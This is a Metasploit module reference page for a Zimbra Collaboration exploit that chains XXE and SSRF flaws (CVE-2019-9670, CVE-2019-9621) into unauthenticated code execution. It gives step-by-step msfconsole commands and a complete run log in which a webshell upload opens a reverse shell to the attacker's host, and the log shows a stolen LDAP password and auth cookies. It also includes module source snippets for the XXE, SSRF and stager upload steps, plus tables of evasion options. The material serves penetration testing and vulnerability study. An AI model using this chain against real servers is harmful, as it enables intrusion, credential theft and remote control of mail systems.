Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF - Metasploit


This page contains detailed information about how to use the exploit/linux/http/zimbra_xxe_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF
Module: exploit/linux/http/zimbra_xxe_rce
Source code: modules/exploits/linux/http/zimbra_xxe_rce.rb
Disclosure date: 2019-03-13
Last modification time: 2019-04-01 17:21:23 +0000
Supported architecture(s): java
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2019-9621, CVE-2019-9670

This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the Client Upload servlet is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/linux/http/zimbra_xxe_rce
msf exploit(zimbra_xxe_rce) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the ClientUploader is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.

Vulnerable Application


Zimbra Collaboration Suite v8.5 to v8.7.11.

Zimbra 8.7.1 GA FOSS Edition

Installation

Verification Steps


  1. ./msfconsole -q
  2. use exploit/linux/http/zimbra_xxe_rce
  3. set rhosts <rhost>
  4. set lhost <lhost>
  5. exploit

Scenarios


Zimbra 8.7.1 GA 1670 FOSS edition Tested on Ubuntu 16.04.6 LTS

msf5 exploit(linux/http/zimbra_xxe_rce) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Using URL: http://0.0.0.0:8080/2tQ75DxRvaeGRSP
[*] Local IP: http://192.168.171.150:8080/2tQ75DxRvaeGRSP
[*] Server started.
[+] Password found: Syz7fOPJI
[+] User cookie retrieved: ZM_AUTH_TOKEN=0_c6df3ed73afbefd7eff40eb9f6999794ebf764b5_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343239343539303239353b747970653d363a7a696d6272613b753d313a613b7469643d393a3538303338373138373b;
[+] Admin cookie retrieved: ZM_ADMIN_AUTH_TOKEN=0_c1c8a6c715eb8f55c14aa63e82a8ff64e4fbe279_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343136343939303333353b61646d696e3d313a313b747970653d363a7a696d6272613b753d313a613b7469643d383a36303437383736333b;
[*] Uploading jsp shell
[*] Executing payload on /downloads/XFlHBolHjLB.jsp
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.111:53746) at 2019-04-01 07:29:51 -0500
[*] Server stopped.

whoami
zimbra
uname -a
Linux zimbra.mylocaldomain.local 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
../bin/zmcontrol -v
Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
exit
[*] 172.22.222.111 - Command shell session 1 closed.

Go back to menu.

Msfconsole Usage


Here is how the linux/http/zimbra_xxe_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/zimbra_xxe_rce

[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(linux/http/zimbra_xxe_rce) > show info

       Name: Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF
     Module: exploit/linux/http/zimbra_xxe_rce
   Platform: Linux
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-03-13

Provided by:
  An Trinh
  Khanh Viet Pham
  Jacob Robles

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  HTTPDELAY  10               yes       Number of seconds the web server will wait before termination
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8443             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Zimbra application base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an XML external entity vulnerability and a 
  server side request forgery to get unauthenticated code execution on 
  Zimbra Collaboration Suite. The XML external entity vulnerability in 
  the Autodiscover Servlet is used to read a Zimbra configuration file 
  that contains an LDAP password for the 'zimbra' account. The zimbra 
  credentials are then used to get a user authentication cookie with 
  an AuthRequest message. Using the user cookie, a server side request 
  forgery in the Proxy Servlet is used to proxy an AuthRequest with 
  the 'zimbra' credentials to the admin port to retrieve an admin 
  cookie. After gaining an admin cookie the Client Upload servlet is 
  used to upload a JSP webshell that can be triggered from the web 
  server to get command execution on the host. The issues reportedly 
  affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was 
  tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 
  FOSS edition.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-9670
  https://nvd.nist.gov/vuln/detail/CVE-2019-9621
  https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html

Module Options


This is a complete list of options available in the linux/http/zimbra_xxe_rce exploit:

msf6 exploit(linux/http/zimbra_xxe_rce) > show options

Module options (exploit/linux/http/zimbra_xxe_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Number of seconds the web server will wait before termination
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Zimbra application base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/http/zimbra_xxe_rce exploit:

msf6 exploit(linux/http/zimbra_xxe_rce) > show advanced

Module advanced options (exploit/linux/http/zimbra_xxe_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (java/jsp_shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/zimbra_xxe_rce module can exploit:

msf6 exploit(linux/http/zimbra_xxe_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/zimbra_xxe_rce exploit:

msf6 exploit(linux/http/zimbra_xxe_rce) > show payloads

Compatible Payloads
===================

   #  Name                                Disclosure Date  Rank    Check  Description
   -  ----                                ---------------  ----    -----  -----------
   0  payload/generic/custom                               normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                       normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                    normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/java/jsp_shell_bind_tcp                      normal  No     Java JSP Command Shell, Bind TCP Inline
   4  payload/java/jsp_shell_reverse_tcp                   normal  No     Java JSP Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/zimbra_xxe_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/zimbra_xxe_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Request failed


Here is a relevant code snippet related to the "Request failed" error message:

71:	      'method' => 'POST',
72:	      'uri' => normalize_uri(target_uri, '/autodiscover'),
73:	      'encode_params' => false,
74:	      'data' => data
75:	    })
76:	    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 503
77:	    res
78:	  end
79:	
80:	  def soap_discover(check_soap=false)
81:	    xml = REXML::Document.new

Request failed


Here is a relevant code snippet related to the "Request failed" error message:

143:	    res = send_request_cgi({
144:	      'method' => 'POST',
145:	      'uri' => normalize_uri(target_uri, '/service/soap/'),
146:	      'data' => data
147:	    })
148:	    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
149:	    res
150:	  end
151:	
152:	  def proxy_req(data, auth_cookie)
153:	    target = "https://127.0.0.1:7071#{normalize_uri(target_uri, '/service/admin/soap/AuthRequest')}"

Request failed


Here is a relevant code snippet related to the "Request failed" error message:

157:	      'vars_get' => {'target' => target},
158:	      'cookie' => "ZM_ADMIN_AUTH_TOKEN=#{auth_cookie}",
159:	      'data' => data,
160:	      'headers' => {'Host' => "#{datastore['RHOST']}:7071"}
161:	    })
162:	    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
163:	    res
164:	  end
165:	
166:	  def upload_file(file_name, contents, cookie)
167:	    data = Rex::MIME::Message.new

Password not found


Here is a relevant code snippet related to the "Password not found" error message:

206:	  end
207:	
208:	  def primer
209:	    datastore['SSL'] = @ssl
210:	    res = xxe_req(soap_discover)
211:	    fail_with(Failure::UnexpectedReply, 'Password not found') unless res.body =~ /ldap_password.*?value&gt;(.*?)&lt;\/value/m
212:	    password = $1
213:	    username = 'zimbra'
214:	
215:	    print_good("Password found: #{password}")
216:	

Failed to authenticate


Here is a relevant code snippet related to the "Failed to authenticate" error message:

215:	    print_good("Password found: #{password}")
216:	
217:	    data = soap_auth(username, password, false)
218:	    res = cookie_req(data)
219:	
220:	    fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /ZM_AUTH_TOKEN=([^;]+;)/
221:	    auth_cookie = $1
222:	
223:	    print_good("User cookie retrieved: ZM_AUTH_TOKEN=#{auth_cookie}")
224:	
225:	    data = soap_auth(username, password)

Failed to authenticate


Here is a relevant code snippet related to the "Failed to authenticate" error message:

223:	    print_good("User cookie retrieved: ZM_AUTH_TOKEN=#{auth_cookie}")
224:	
225:	    data = soap_auth(username, password)
226:	    res = proxy_req(data, auth_cookie)
227:	
228:	    fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /(ZM_ADMIN_AUTH_TOKEN=[^;]+;)/
229:	    admin_cookie = $1
230:	
231:	    print_good("Admin cookie retrieved: #{admin_cookie}")
232:	
233:	    stager_name = "#{rand_text_alpha(8..16)}.jsp"

<PEER> - Unable to upload stager


Here is a relevant code snippet related to the "<PEER> - Unable to upload stager" error message:

232:	
233:	    stager_name = "#{rand_text_alpha(8..16)}.jsp"
234:	    print_status('Uploading jsp shell')
235:	    res = upload_file(stager_name, payload.encoded, admin_cookie)
236:	
237:	    fail_with(Failure::Unknown, "#{peer} - Unable to upload stager") unless res && res.code == 200
238:	    # Only shell sessions are supported
239:	    register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name}' -type f)")
240:	    register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name[0...-4]}.*1StreamConnector.class' -type f)")
241:	    register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name[0...-4]}.*class' -type f)")
242:	    register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name[0...-4]}.*java' -type f)")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • An Trinh
  • Khanh Viet Pham
  • Jacob Robles

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.